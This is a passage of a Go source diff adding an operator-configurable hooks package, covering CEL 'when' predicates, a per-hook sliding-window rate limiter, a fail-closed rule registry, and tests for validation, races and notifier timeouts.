+// leak into expression field names. Keeping a dedicated `cel:` tagged view
+// also means the expression surface is an explicit, reviewable contract rather
+// than whatever Payload happens to expose.
+type celPayload struct {
+	Transition string            `cel:"transition"`
+	From       string            `cel:"from"`
+	To         string            `cel:"to"`
+	Agent      string            `cel:"agent"`
+	Repo       string            `cel:"repo"`
+	Actor      string            `cel:"actor"`
+	Trigger    string            `cel:"trigger"`
+	Reason     string            `cel:"reason"`
+	Model      string            `cel:"model"`
+	Backend    string            `cel:"backend"`
+	Pin        string            `cel:"pin"`
+	ACMMLevel  int               `cel:"acmm_level"`
+	Attrs      map[string]string `cel:"attrs"`
+}
+
+// forCEL projects a Payload into its CEL view. Attrs is never nil in the
+// projection so an expression like `t.attrs["pr"] != ""` evaluates cleanly
+// against a transition that set no attrs, instead of erroring on a null map.
+func (p Payload) forCEL() celPayload {
+	attrs := p.Attrs
+	if attrs == nil {
+		attrs = map[string]string{}
+	}
+	return celPayload{
+		Transition: string(p.Transition),
+		From:       p.From,
+		To:         p.To,
+		Agent:      p.Agent,
+		Repo:       p.Repo,
+		Actor:      p.Actor,
+		Trigger:    p.Trigger,
+		Reason:     p.Reason,
+		Model:      p.Model,
+		Backend:    p.Backend,
+		Pin:        p.Pin,
+		ACMMLevel:  p.ACMMLevel,
+		Attrs:      attrs,
+	}
+}
+
+// predicate is a compiled `when:` expression.
+type predicate struct {
+	expr    string
+	program cel.Program
+}
+
+// predicateEnv builds the CEL environment exposing the transition payload.
+// Registering celPayload as a native type means an expression referencing an
+// unknown field is a COMPILE error — an operator's typo (`t.agnet`) is caught
+// at config load rather than becoming a predicate that silently never matches.
+//
+// It also registers attr(), because CEL's native map index raises "no such
+// key" for an absent key rather than yielding the zero value. Under the
+// fail-closed rule a raised error means no-match, so the natural-looking
+// `t.attrs["pr"] != ""` would SILENTLY NEVER FIRE for exactly the transitions
+// that omit that attr — the same "hook you believe is armed" trap the closed
+// vocabularies exist to prevent. attr() gives operators a total accessor.
+func predicateEnv() (*cel.Env, error) {
+	return cel.NewEnv(
+		ext.NativeTypes(reflect.TypeOf(celPayload{}), ext.ParseStructTags(true)),
+		cel.Variable(activationVarTransition, cel.ObjectType("hooks.celPayload")),
+		// attr(t.attrs, "pr") — "" when the key is absent, never an error.
+		cel.Function("attr",
+			cel.Overload("attr_map_string",
+				[]*cel.Type{cel.MapType(cel.StringType, cel.StringType), cel.StringType},
+				cel.StringType,
+				cel.BinaryBinding(attrImpl),
+			),
+		),
+	)
+}
+
+// attrImpl implements attr(map, key): the value, or "" when absent. Non-map or
+// non-string inputs yield "" rather than erroring, keeping evaluation total.
+func attrImpl(mapVal, keyVal ref.Val) ref.Val {
+	key, ok := keyVal.Value().(string)
+	if !ok {
+		return types.String("")
+	}
+	mapper, ok := mapVal.(traits.Mapper)
+	if !ok {
+		return types.String("")
+	}
+	found, ok := mapper.Find(types.String(key))
+	if !ok || found == nil {
+		return types.String("")
+	}
+	s, ok := found.Value().(string)
+	if !ok {
+		return types.String("")
+	}
+	return types.String(s)
+}
+
+// compilePredicate compiles a `when:` expression, rejecting anything that does
+// not parse, type-check, or yield a bool.
+func compilePredicate(expr string) (*predicate, error) {
+	env, err := predicateEnv()
+	if err != nil {
+		return nil, fmt.Errorf("build env: %w", err)
+	}
+	ast, iss := env.Compile(expr)
+	if iss != nil && iss.Err() != nil {
+		return nil, fmt.Errorf("compile: %w", iss.Err())
+	}
+	if ast.OutputType() != cel.BoolType {
+		return nil, fmt.Errorf("expression must return bool, got %s", ast.OutputType())
+	}
+	prg, err := env.Program(ast, cel.CostLimit(maxPredicateCost), cel.InterruptCheckFrequency(100))
+	if err != nil {
+		return nil, fmt.Errorf("program: %w", err)
+	}
+	return &predicate{expr: expr, program: prg}, nil
+}
+
+// matches evaluates the predicate against a payload. A nil predicate (no
+// `when:`) always matches. Any runtime error is fail-closed no-match, logged
+// so an operator can diagnose a predicate that stopped firing rather than
+// having it disappear silently.
+func (p *predicate) matches(payload Payload, logger *slog.Logger) bool {
+	if p == nil {
+		return true
+	}
+	out, _, err := p.program.Eval(map[string]any{activationVarTransition: payload.forCEL()})
+	if err != nil {
+		if logger != nil {
+			msg := "hooks: when-predicate evaluation failed; treating as no-match"
+			if isPredicateCostExceeded(err) {
+				msg = "hooks: when-predicate exceeded evaluation cost budget; treating as no-match"
+			}
+			logger.Warn(msg, "expr", p.expr, "error", err)
+		}
+		return false
+	}
+	b, ok := out.Value().(bool)
+	return ok && b
+}
+
+// isPredicateCostExceeded reports whether an eval error was the cost limit,
+// which is worth distinguishing in logs from a genuine expression error.
+func isPredicateCostExceeded(err error) bool {
+	var cancelled interpreter.EvalCancelledError
+	return errors.As(err, &cancelled) && cancelled.Cause == interpreter.CostLimitExceeded
+}

--- a/src/pkg/hooks/ratelimit_race_test.go
+++ b/src/pkg/hooks/ratelimit_race_test.go
@@ -1,0 +1,283 @@
+package hooks
+
+import (
+	"context"
+	"strings"
+	"sync"
+	"testing"
+	"time"
+)
+
+// TestRateLimiterInPlaceFilterKeepsCorrectTimestamps guards the recent[:0]
+// aliasing in allow(): the filter reuses the backing array, so an off-by-one
+// there would silently retain or drop the wrong firings and corrupt the
+// ceiling in one direction or the other.
+func TestRateLimiterInPlaceFilterKeepsCorrectTimestamps(t *testing.T) {
+	rl := newRateLimiter()
+	base := time.Date(2026, 8, 17, 9, 0, 0, 0, time.UTC)
+
+	// Fill the window with 5 firings spread over 50 seconds.
+	for i := 0; i < 5; i++ {
+		if !rl.allow("h", 5, base.Add(time.Duration(i*10)*time.Second)) {
+			t.Fatalf("setup firing %d should be allowed", i)
+		}
+	}
+	if rl.allow("h", 5, base.Add(51*time.Second)) {
+		t.Fatal("6th firing inside the window must be refused")
+	}
+
+	// At base+65s the cutoff is base+5s, so only the t=0s firing has aged out;
+	// t=10,20,30,40 remain (4 of 5). Exactly ONE more slot is free, and the
+	// next firing after that must be refused — partial expiry frees exactly
+	// the number of slots that actually aged out, never more.
+	if !rl.allow("h", 5, base.Add(65*time.Second)) {
+		t.Error("the one slot freed by partial expiry should be usable")
+	}
+	if rl.allow("h", 5, base.Add(65*time.Second)) {
+		t.Error("ceiling must still bind after partial expiry")
+	}
+
+	// At base+95s the cutoff is base+35s: t=10,20,30 have now aged out too,
+	// leaving t=40 and the t=65 firing. Three slots free.
+	for i := 0; i < 3; i++ {
+		if !rl.allow("h", 5, base.Add(95*time.Second)) {
+			t.Errorf("slot %d freed by further expiry should be usable", i)
+		}
+	}
+	if rl.allow("h", 5, base.Add(95*time.Second)) {
+		t.Error("ceiling must bind again once the window refills")
+	}
+
+	// Retained timestamps must all be inside the window.
+	cutoff := base.Add(65 * time.Second).Add(-rateLimitWindow)
+	for _, ts := range rl.firings["h"] {
+		if !ts.After(cutoff) {
+			t.Errorf("stale timestamp %v retained past cutoff %v", ts, cutoff)
+		}
+	}
+}
+
+// TestRateLimiterWindowIsHalfOpen pins the boundary semantics. The window is
+// half-open: a timestamp exactly rateLimitWindow old has aged out (the check is
+// After(cutoff), not !Before). So a burst at t=0 plus one firing at exactly
+// t=60s means limit+1 firings can occur within a single 60-second SPAN.
+//
+// That is inherent to a sliding window and is intentional — the guarantee is
+// "at most `limit` in any trailing window", not "at most `limit` per calendar
+// minute". It is pinned here so the boundary is not later "fixed" into an
+// off-by-one that makes capacity fail to recover.
+func TestRateLimiterWindowIsHalfOpen(t *testing.T) {
+	rl := newRateLimiter()
+	base := time.Date(2026, 8, 17, 9, 0, 0, 0, time.UTC)
+	const limit = 3
+
+	for i := 0; i < limit; i++ {
+		if !rl.allow("h", limit, base) {
+			t.Fatalf("burst firing %d should be allowed", i)
+		}
+	}
+	if rl.allow("h", limit, base) {
+		t.Fatal("a firing over the ceiling at the same instant must be refused")
+	}
+
+	// At exactly base+window the earlier firings have aged out.
+	if !rl.allow("h", limit, base.Add(rateLimitWindow)) {
+		t.Error("a firing exactly one window later must be allowed (half-open window)")
+	}
+
+	// One nanosecond BEFORE the boundary they have not.
+	rl2 := newRateLimiter()
+	for i := 0; i < limit; i++ {
+		rl2.allow("h", limit, base)
+	}
+	if rl2.allow("h", limit, base.Add(rateLimitWindow-time.Nanosecond)) {
+		t.Error("just inside the window the ceiling must still bind")
+	}
+}
+
+// TestRateLimiterRecoversAfterLimitShrink: an operator lowering the limit on
+// reload must not wedge a hook permanently — capacity has to return once the
+// existing firings age out.
+func TestRateLimiterRecoversAfterLimitShrink(t *testing.T) {
+	rl := newRateLimiter()
+	base := time.Date(2026, 8, 17, 9, 0, 0, 0, time.UTC)
+
+	for i := 0; i < 10; i++ {
+		rl.allow("h", 10, base.Add(time.Duration(i)*time.Second))
+	}
+	// Reload drops the ceiling to 2 while 10 firings are still in the window.
+	if rl.allow("h", 2, base.Add(11*time.Second)) {
+		t.Error("a shrunken ceiling must bind immediately")
+	}
+	// Once they age out, the hook fires again rather than staying wedged.
+	if !rl.allow("h", 2, base.Add(70*time.Second)) {
+		t.Error("capacity must recover after the window clears; the hook must not wedge")
+	}
+}
+
+// TestFireCopiesAttrsSoCallerMayReuseTheMap: dispatch is asynchronous, so an
+// emitter that mutates or reuses its attrs map after Fire returns — which looks
+// completely safe, since Fire appears to have finished — would otherwise race
+// the hook goroutines reading it. Run under -race, this fails if Fire ever
+// stops copying.
+func TestFireCopiesAttrsSoCallerMayReuseTheMap(t *testing.T) {
+	notifier := &fakeNotifier{}
+	d := NewDispatcher(
+		mustRegistry(t,
+			Hook{Name: "a", On: TransitionReviewRejected, Action: ActionNotify,
+				When: `attr(t.attrs, "pr") != ""`},
+			Hook{Name: "b", On: TransitionReviewRejected, Action: ActionNotify,
+				When: `attr(t.attrs, "pr") != ""`},
+		),
+		quietLogger(), WithNotifier(notifier))
+
+	attrs := map[string]string{AttrPR: "4001"}
+	d.Fire(context.Background(), Payload{
+		Transition: TransitionReviewRejected, Agent: "reviewer", Attrs: attrs,
+	})
+
+	// The caller carries on using its own map, as an emitter reasonably might.
+	for i := 0; i < 200; i++ {
+		attrs["scratch"] = "mutated"
+		delete(attrs, "scratch")
+	}
+	d.Wait()
+
+	if notifier.count() != 2 {
+		t.Errorf("both hooks should have fired against the snapshot, got %d", notifier.count())
+	}
+}
+
+// TestRateLimitIsConsumedBeforeThePredicate pins a deliberate but surprising
+// ordering: the limiter is checked before `when:` is evaluated, so a firing the
+// predicate later declines still costs a slot. That keeps a flapping transition
+// from becoming a CEL-evaluation storm, at the cost that a highly selective
+// predicate on a noisy transition can exhaust quota without ever firing.
+//
+// Pinned because the opposite order looks like an obvious "optimization" and
+// would quietly remove the bound this design relies on.
+func TestRateLimitIsConsumedBeforeThePredicate(t *testing.T) {
+	notifier := &fakeNotifier{}
+	audit := &fakeAudit{}
+	now := time.Date(2026, 8, 17, 9, 0, 0, 0, time.UTC)
+
+	d := NewDispatcher(
+		mustRegistry(t, Hook{
+			Name: "selective", On: TransitionGovernorModeChange, Action: ActionNotify,
+			When:               `t.to == "surge"`,
+			RateLimitPerMinute: 2,
+		}),
+		quietLogger(), WithNotifier(notifier), WithAuditSink(audit),
+		WithClock(func() time.Time { return now }),
+	)
+
+	// Two non-matching transitions consume the whole quota.
+	for i := 0; i < 2; i++ {
+		d.Fire(context.Background(), Payload{
+			Transition: TransitionGovernorModeChange, To: "idle",
+		})
+	}
+	d.Wait()
+	if notifier.count() != 0 {
+		t.Fatalf("non-matching predicate must not notify, got %d", notifier.count())
+	}
+
+	// A matching transition now finds the quota already spent.
+	d.Fire(context.Background(), Payload{
+		Transition: TransitionGovernorModeChange, To: "surge",
+	})
+	d.Wait()
+
+	if notifier.count() != 0 {
+		t.Error("quota is consumed before the predicate; the matching firing should be suppressed")
+	}
+	if got := len(audit.withAction(AuditHookRateLimited)); got != 1 {
+		t.Errorf("the suppression must be audited, not silent; got %d entries", got)
+	}
+}
+
+// hangingNotifier blocks until released, modelling a wedged ntfy endpoint.
+type hangingNotifier struct{ release chan struct{} }
+
+func (h hangingNotifier) Send(title, message, priority string) { <-h.release }
+
+// TestHungNotifierTimesOutAndDoesNotWedgeWait: Notifier.Send takes no context,
+// so without an explicit bound the action timeout would be decorative for the
+// one action shipped end-to-end — a wedged notifier would pin its goroutine
+// and Wait() would never return. The hook must instead fail with a timeout.
+func TestHungNotifierTimesOutAndDoesNotWedgeWait(t *testing.T) {
+	release := make(chan struct{})
+	defer close(release) // let the detached goroutine finish and exit
+
+	audit := &fakeAudit{}
+	d := NewDispatcher(
+		mustRegistry(t, Hook{Name: "hangs", On: TransitionReviewRejected, Action: ActionNotify}),
+		quietLogger(),
+		WithNotifier(hangingNotifier{release: release}),
+		WithAuditSink(audit),
+	)
+
+	// A context already past its deadline stands in for the 30s budget so the
+	// test does not have to wait it out.
+	ctx, cancel := context.WithTimeout(context.Background(), time.Millisecond)
+	defer cancel()
+
+	d.Fire(ctx, Payload{Transition: TransitionReviewRejected, Agent: "reviewer"})
+
+	settled := make(chan struct{})
+	go func() { d.Wait(); close(settled) }()
+	select {
+	case <-settled:
+	case <-time.After(10 * time.Second):
+		t.Fatal("Wait() never returned: a hung notifier wedged the dispatcher")
+	}
+
+	failures := audit.withAction(AuditHookFailed)
+	if len(failures) != 1 {
+		t.Fatalf("expected the timeout to be audited as a failure, got %d entries", len(failures))
+	}
+	if msg, _ := failures[0].fields["error"].(string); !strings.Contains(msg, "timed out") {
+		t.Errorf("expected a timeout error, got %q", msg)
+	}
+}
+
+// TestConcurrentFireIsRaceFree drives many transitions through one dispatcher
+// from many goroutines, exercising the registry snapshot + limiter under -race.
+func TestConcurrentFireIsRaceFree(t *testing.T) {
+	notifier := &fakeNotifier{}
+	audit := &fakeAudit{}
+	d := NewDispatcher(
+		mustRegistry(t,
+			Hook{Name: "a", On: TransitionReviewRejected, Action: ActionNotify, RateLimitPerMinute: 100},
+			Hook{Name: "b", On: TransitionReviewRejected, Action: ActionNotify, RateLimitPerMinute: 100},
+		),
+		quietLogger(), WithNotifier(notifier), WithAuditSink(audit))
+
+	var wg sync.WaitGroup
+	for i := 0; i < 50; i++ {
+		wg.Add(1)
+		go func() {
+			defer wg.Done()
+			d.Fire(context.Background(), Payload{
+				Transition: TransitionReviewRejected, Agent: "reviewer",
+			})
+		}()
+	}
+	// Concurrent hot reloads race against dispatch.
+	for i := 0; i < 5; i++ {
+		wg.Add(1)
+		go func() {
+			defer wg.Done()
+			d.SetRegistry(mustRegistry(t, Hook{
+				Name: "a", On: TransitionReviewRejected, Action: ActionNotify, RateLimitPerMinute: 100,
+			}))
+		}()
+	}
+	wg.Wait()
+	d.Wait()
+
+	// The ceiling must have held: never more than the two hooks' combined limit.
+	if got := notifier.count(); got > 200 {
+		t.Errorf("rate ceiling breached under concurrency: %d notifications", got)
+	}
+}

--- a/src/pkg/hooks/registry.go
+++ b/src/pkg/hooks/registry.go
@@ -1,0 +1,296 @@
+package hooks
+
+import (
+	"fmt"
+	"sort"
+	"strings"
+	"time"
+)
+
+// Hook is one operator-declared rule: when the named transition commits and
+// the optional CEL predicate matches, perform the vetted action.
+//
+// This is the in-package form. The config-facing mirror with yaml/json tags is
+// config.HookRule, converted by Load — the same split pkg/celtrigger uses
+// between Rule and config.TriggerRule, which keeps this package free of a
+// config import and therefore testable without building a Config.
+type Hook struct {
+	// Name identifies the hook in logs, audit entries, and rate-limit
+	// bookkeeping. Required and must be unique across the registry: a
+	// duplicate name would make the audit trail ambiguous about which rule
+	// fired, and would make the two rules share a rate-limit bucket.
+	Name string
+
+	// On is the transition this hook attaches to. Must be in the catalog.
+	On Transition
+
+	// Action is the vetted operation to perform. Must be in the vetted set.
+	Action Action
+
+	// Params carries action-specific settings (notify's title/message/priority,
+	// pause's agent/reason, annotate's note, enqueue-approval's kind/summary).
+	// Unknown keys are tolerated so a config written for a newer hive does not
+	// hard-fail an older one; unknown ACTIONS are not.
+	Params map[string]string
+
+	// When is an optional CEL predicate over the transition payload, exposed
+	// as `t`. Empty means "always fire". A predicate that fails to compile
+	// rejects the whole config (fail-closed, like celtrigger.Compile).
+	When string
+
+	// RateLimitPerMinute caps firings of THIS hook. Zero uses
+	// DefaultRateLimitPerMinute; negative is rejected by validation. There is
+	// no "unlimited" setting: a flapping governor mode must not be able to
+	// become a notification storm, so every hook has a ceiling.
+	RateLimitPerMinute int
+}
+
+// DefaultRateLimitPerMinute is the per-hook firing ceiling applied when a hook
+// does not set its own. Chosen to comfortably pass real operator traffic (a
+// handful of pauses or mode changes a minute) while capping a flapping-state
+// storm at a rate a human can still read in the audit log.
+const DefaultRateLimitPerMinute = 12
+
+// MaxRateLimitPerMinute is the hard ceiling an operator may configure. It
+// exists so `rate_limit_per_minute: 100000` — which is effectively "unlimited"
+// and reintroduces the storm this guard prevents — is rejected at load time
+// rather than silently honored.
+const MaxRateLimitPerMinute = 120
+
+// maxHooks bounds the registry size. A config with thousands of hooks would
+// make every transition's dispatch loop unbounded work on the post-commit
+// path; this keeps the cost of Fire predictable.
+const maxHooks = 100
+
+// effectiveRateLimit returns the per-minute ceiling for this hook.
+func (h Hook) effectiveRateLimit() int {
+	if h.RateLimitPerMinute <= 0 {
+		return DefaultRateLimitPerMinute
+	}
+	return h.RateLimitPerMinute
+}
+
+// Registry is a compiled, validated set of hooks indexed by transition. It is
+// immutable once built: hot reload replaces the whole Registry atomically in
+// the Dispatcher rather than mutating one in place, so a dispatch in flight
+// always sees a coherent rule set.
+type Registry struct {
+	// byTransition indexes hooks by the transition they attach to, so Fire is
+	// a map lookup rather than a scan of every rule.
+	byTransition map[Transition][]compiledHook
+	// count is the total number of hooks, for logging.
+	count int
+}
+
+// compiledHook pairs a validated Hook with its compiled `when:` predicate.
+type compiledHook struct {
+	hook Hook
+	// pred is nil when the hook has no `when:`, meaning "always match".
+	pred *predicate
+}
+
+// Compile validates a hook list and returns a ready Registry.
+//
+// It FAILS CLOSED, and this is the single most important property of the
+// function: an unknown transition, an unknown action, a malformed predicate, a
+// duplicate name, or an out-of-range rate limit rejects the ENTIRE config with
+// an error rather than skipping the offending rule. Skipping would leave an
+// operator with a hook they believe is armed and which silently never fires —
+// the failure mode that makes declarative rules engines untrustworthy. The
+// caller (the wiring layer) keeps the previous registry on error, exactly as
+// celEngineFor keeps the previous CEL engine.
+//
+// An empty list yields a valid, empty Registry that never fires.
+func Compile(hooks []Hook) (*Registry, error) {
+	if len(hooks) > maxHooks {
+		return nil, fmt.Errorf("hooks: %d hooks exceeds the maximum of %d", len(hooks), maxHooks)
+	}
+
+	reg := &Registry{byTransition: make(map[Transition][]compiledHook)}
+	seen := make(map[string]struct{}, len(hooks))
+
+	for i, h := range hooks {
+		name := strings.TrimSpace(h.Name)
+		if name == "" {
+			return nil, fmt.Errorf("hooks: rule[%d]: name is required", i)
+		}
+		if _, dup := seen[name]; dup {
+			return nil, fmt.Errorf("hooks: duplicate hook name %q", name)
+		}
+		seen[name] = struct{}{}
+		h.Name = name
+
+		if !IsKnownTransition(h.On) {
+			return nil, fmt.Errorf("hooks: %q: unknown transition %q (known: %s)",
+				name, h.On, transitionList())
+		}
+		if !IsVettedAction(h.Action) {
+			// The error names the vetted set explicitly because the most
+			// likely cause is an operator reaching for exec/script, and the
+			// message should make the closed vocabulary obvious.
+			return nil, fmt.Errorf("hooks: %q: action %q is not in the vetted set (allowed: %s)",
+				name, h.Action, actionList())
+		}
+		if h.RateLimitPerMinute < 0 {
+			return nil, fmt.Errorf("hooks: %q: rate_limit_per_minute must not be negative", name)
+		}
+		if h.RateLimitPerMinute > MaxRateLimitPerMinute {
+			return nil, fmt.Errorf("hooks: %q: rate_limit_per_minute %d exceeds the maximum of %d",
+				name, h.RateLimitPerMinute, MaxRateLimitPerMinute)
+		}
+		if err := validateParams(h); err != nil {
+			return nil, fmt.Errorf("hooks: %q: %w", name, err)
+		}
+
+		ch := compiledHook{hook: h}
+		if strings.TrimSpace(h.When) != "" {
+			pred, err := compilePredicate(h.When)
+			if err != nil {
+				return nil, fmt.Errorf("hooks: %q: when: %w", name, err)
+			}
+			ch.pred = pred
+		}
+
+		reg.byTransition[h.On] = append(reg.byTransition[h.On], ch)
+		reg.count++
+	}
+
+	return reg, nil
+}
+
+// validateParams enforces the per-action parameter contract at LOAD time, so a
+// hook that could never succeed (a notify with no message, an unknown priority)
+// is an operator-visible config error rather than a runtime failure discovered
+// later in the audit log.
+func validateParams(h Hook) error {
+	switch h.Action {
+	case ActionNotify:
+		if p := strings.TrimSpace(h.Params["priority"]); p != "" {
+			switch strings.ToLower(p) {
+			case "high", "default", "low":
+			default:
+				return fmt.Errorf("notify: unknown priority %q (allowed: high, default, low)", p)
+			}
+		}
+	case ActionPause:
+		// A pause hook with no explicit agent falls back to the transition's
+		// agent. That is valid for agent-scoped transitions but can never work
+		// for one that carries no agent, so reject the combination up front.
+		if strings.TrimSpace(h.Params["agent"]) == "" && !transitionCarriesAgent(h.On) {
+			return fmt.Errorf("pause: transition %q carries no agent; set params.agent explicitly", h.On)
+		}
+	}
+	return nil
+}
+
+// transitionCarriesAgent reports whether a transition reliably populates
+// Payload.Agent, derived from the catalog so the two cannot drift.
+func transitionCarriesAgent(t Transition) bool {
+	entry, ok := catalog[t]
+	if !ok {
+		return false
+	}
+	for _, f := range entry.Fields {
+		if f == "agent" {
+			return true
+		}
+	}
+	return false
+}
+
+// For returns the compiled hooks attached to a transition, or nil. Nil-safe.
+func (r *Registry) For(t Transition) []compiledHook {
+	if r == nil {
+		return nil
+	}
+	return r.byTransition[t]
+}
+
+// Len reports the total number of hooks in the registry. Nil-safe.
+func (r *Registry) Len() int {
+	if r == nil {
+		return 0
+	}
+	return r.count
+}
+
+// Signature returns a stable string identifying this hook list, so the wiring
+// layer can detect a config change and recompile only then — the same
+// memoization celwire.go uses for CEL triggers.
+func Signature(hooks []Hook) string {
+	if len(hooks) == 0 {
+		return ""
+	}
+	var b strings.Builder
+	for _, h := range hooks {
+		// \x1f separates fields, \x00 separates rules, so distinct hook lists
+		// cannot collide by concatenation.
+		fmt.Fprintf(&b, "%s\x1f%s\x1f%s\x1f%s\x1f%d\x1f",
+			h.Name, h.On, h.Action, h.When, h.RateLimitPerMinute)
+		// Params are order-independent in YAML, so sort for a stable signature.
+		for _, k := range sortedKeys(h.Params) {
+			fmt.Fprintf(&b, "%s=%s\x1e", k, h.Params[k])
+		}
+		b.WriteByte(0x00)
+	}
+	return b.String()
+}
+
+// ---------------------------------------------------------------------------
+// Rate limiting
+// ---------------------------------------------------------------------------
+
+// rateLimiter enforces a per-hook firings-per-minute ceiling using a sliding
+// window of firing timestamps.
+//
+// A sliding window rather than a token bucket because the property operators
+// reason about is "at most N notifications a minute", and a bucket's burst
+// allowance makes that harder to state. The window is bounded by the limit
+// itself (we retain at most limit timestamps per hook), so memory is capped.
+type rateLimiter struct {
+	// firings maps hook name → the timestamps of its recent firings, oldest
+	// first. Guarded by the Dispatcher's mutex.
+	firings map[string][]time.Time
+}
+
+func newRateLimiter() *rateLimiter {
+	return &rateLimiter{firings: make(map[string][]time.Time)}
+}
+
+// rateLimitWindow is the period over which a hook's limit applies.
+const rateLimitWindow = time.Minute
+
+// allow reports whether a firing of the named hook is within its limit, and
+// records it when so. Caller holds the Dispatcher's mutex.
+func (rl *rateLimiter) allow(name string, limit int, now time.Time) bool {
+	cutoff := now.Add(-rateLimitWindow)
+
+	// Drop timestamps that have aged out of the window.
+	recent := rl.firings[name]
+	kept := recent[:0]
+	for _, ts := range recent {
+		if ts.After(cutoff) {
+			kept = append(kept, ts)
+		}
+	}
+
+	if len(kept) >= limit {
+		rl.firings[name] = kept
+		return false
+	}
+	rl.firings[name] = append(kept, now)
+	return true
+}
+
+// sortedKeys returns a map's keys in sorted order, for stable rendering.
+func sortedKeys(m map[string]string) []string {
+	if len(m) == 0 {
+		return nil
+	}
+	keys := make([]string, 0, len(m))
+	for k := range m {
+		keys = append(keys, k)
+	}
+	sort.Strings(keys)
+	return keys
+}

--- a/src/pkg/hooks/registry_test.go
+++ b/src/pkg/hooks/registry_test.go
@@ -1,0 +1,384 @@
+package hooks
+
+import (
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/kubestellar/hive/pkg/config"
+)
+
+// TestCompileRejectsUnknownTransition is the core fail-closed guarantee: a
+// typo'd or invented `on:` must reject the WHOLE config, not skip the rule.
+// Skipping would leave an operator with a hook they believe is armed and which
+// silently never fires.
+func TestCompileRejectsUnknownTransition(t *testing.T) {
+	_, err := Compile([]Hook{{
+		Name:   "bad",
+		On:     Transition("on_agent_exploded"),
+		Action: ActionNotify,
+	}})
+	if err == nil {
+		t.Fatal("expected an unknown transition to be rejected, got nil error")
+	}
+	if !strings.Contains(err.Error(), "unknown transition") {
+		t.Errorf("error should name the problem, got: %v", err)
+	}
+	// The message must list the catalog so an operator can self-correct.
+	if !strings.Contains(err.Error(), string(TransitionReviewRejected)) {
+		t.Errorf("error should enumerate known transitions, got: %v", err)
+	}
+}
+
+// TestCompileRejectsUnknownAction guards the closed action vocabulary. The
+// specific case that matters is `exec`: it is deliberately absent from this
+// slice, and reaching for it must be a loud config error.
+func TestCompileRejectsUnknownAction(t *testing.T) {
+	for _, action := range []string{"exec", "script", "run", "shell", ""} {
+		_, err := Compile([]Hook{{
+			Name:   "bad",
+			On:     TransitionAgentPaused,
+			Action: Action(action),
+		}})
+		if err == nil {
+			t.Fatalf("action %q: expected rejection, got nil error", action)
+		}
+		if !strings.Contains(err.Error(), "not in the vetted set") {
+			t.Errorf("action %q: error should name the vetted set, got: %v", action, err)
+		}
+	}
+}
+
+// TestCompileRejectsWholeListOnOneBadRule proves rejection is all-or-nothing:
+// a good rule alongside a bad one must NOT produce a partially-armed registry.
+func TestCompileRejectsWholeListOnOneBadRule(t *testing.T) {
+	reg, err := Compile([]Hook{
+		{Name: "good", On: TransitionReviewRejected, Action: ActionNotify},
+		{Name: "bad", On: Transition("nope"), Action: ActionNotify},
+	})
+	if err == nil {
+		t.Fatal("expected the whole list to be rejected")
+	}
+	if reg != nil {
+		t.Error("a rejected config must yield no registry, not a partial one")
+	}
+}
+
+func TestCompileRejectsDuplicateNames(t *testing.T) {
+	_, err := Compile([]Hook{
+		{Name: "dup", On: TransitionReviewRejected, Action: ActionNotify},
+		{Name: "dup", On: TransitionAgentPaused, Action: ActionNotify},
+	})
+	if err == nil || !strings.Contains(err.Error(), "duplicate hook name") {
+		t.Fatalf("expected duplicate-name rejection, got: %v", err)
+	}
+}
+
+func TestCompileRejectsMissingName(t *testing.T) {
+	_, err := Compile([]Hook{{On: TransitionReviewRejected, Action: ActionNotify}})
+	if err == nil || !strings.Contains(err.Error(), "name is required") {
+		t.Fatalf("expected missing-name rejection, got: %v", err)
+	}
+}
+
+// TestCompileRejectsUnboundedRateLimit: there is no "unlimited" setting, so an
+// absurd ceiling that would reintroduce the storm must be refused at load.
+func TestCompileRejectsUnboundedRateLimit(t *testing.T) {
+	_, err := Compile([]Hook{{
+		Name: "storm", On: TransitionGovernorModeChange, Action: ActionNotify,
+		RateLimitPerMinute: 100000,
+	}})
+	if err == nil || !strings.Contains(err.Error(), "exceeds the maximum") {
+		t.Fatalf("expected an over-max rate limit to be rejected, got: %v", err)
+	}
+
+	if _, err := Compile([]Hook{{
+		Name: "neg", On: TransitionGovernorModeChange, Action: ActionNotify,
+		RateLimitPerMinute: -1,
+	}}); err == nil {
+		t.Fatal("expected a negative rate limit to be rejected")
+	}
+}
+
+func TestCompileRejectsTooManyHooks(t *testing.T) {
+	many := make([]Hook, maxHooks+1)
+	for i := range many {
+		many[i] = Hook{
+			Name:   "h" + string(rune('a'+i%26)) + strings.Repeat("x", i/26+1),
+			On:     TransitionReviewRejected,
+			Action: ActionNotify,
+		}
+	}
+	if _, err := Compile(many); err == nil {
+		t.Fatal("expected an oversized hook list to be rejected")
+	}
+}
+
+// TestCompileRejectsMalformedPredicate: a bad `when:` must fail at COMPILE
+// time, like celtrigger, rather than becoming a runtime surprise.
+func TestCompileRejectsMalformedPredicate(t *testing.T) {
+	cases := map[string]string{
+		"syntax error":  `t.agent ==`,
+		"unknown field": `t.agnet == "x"`,
+		"non-boolean":   `t.agent`,
+		"unknown var":   `nope == 1`,
+	}
+	for name, expr := range cases {
+		if _, err := Compile([]Hook{{
+			Name: "p", On: TransitionReviewRejected, Action: ActionNotify, When: expr,
+		}}); err == nil {
+			t.Errorf("%s (%q): expected compile rejection", name, expr)
+		}
+	}
+}
+
+func TestCompileAcceptsValidPredicate(t *testing.T) {
+	reg, err := Compile([]Hook{{
+		Name: "p", On: TransitionReviewRejected, Action: ActionNotify,
+		When: `t.agent == "reviewer" && t.model.startsWith("claude") && attr(t.attrs, "pr") != ""`,
+	}})
+	if err != nil {
+		t.Fatalf("valid predicate rejected: %v", err)
+	}
+	if reg.Len() != 1 {
+		t.Errorf("expected 1 hook, got %d", reg.Len())
+	}
+}
+
+// TestCompileRejectsNotifyUnknownPriority validates the per-action param
+// contract at load time.
+func TestCompileRejectsNotifyUnknownPriority(t *testing.T) {
+	_, err := Compile([]Hook{{
+		Name: "n", On: TransitionReviewRejected, Action: ActionNotify,
+		Params: map[string]string{"priority": "URGENT"},
+	}})
+	if err == nil || !strings.Contains(err.Error(), "unknown priority") {
+		t.Fatalf("expected unknown priority to be rejected, got: %v", err)
+	}
+}
+
+// TestCompileRejectsPauseOnAgentlessTransition: a pause hook that could never
+// resolve an agent is a config error, not a runtime one.
+func TestCompileRejectsPauseOnAgentlessTransition(t *testing.T) {
+	// governor_mode_change carries no agent.
+	_, err := Compile([]Hook{{
+		Name: "p", On: TransitionGovernorModeChange, Action: ActionPause,
+	}})
+	if err == nil || !strings.Contains(err.Error(), "carries no agent") {
+		t.Fatalf("expected rejection, got: %v", err)
+	}
+
+	// …but it is fine with an explicit agent.
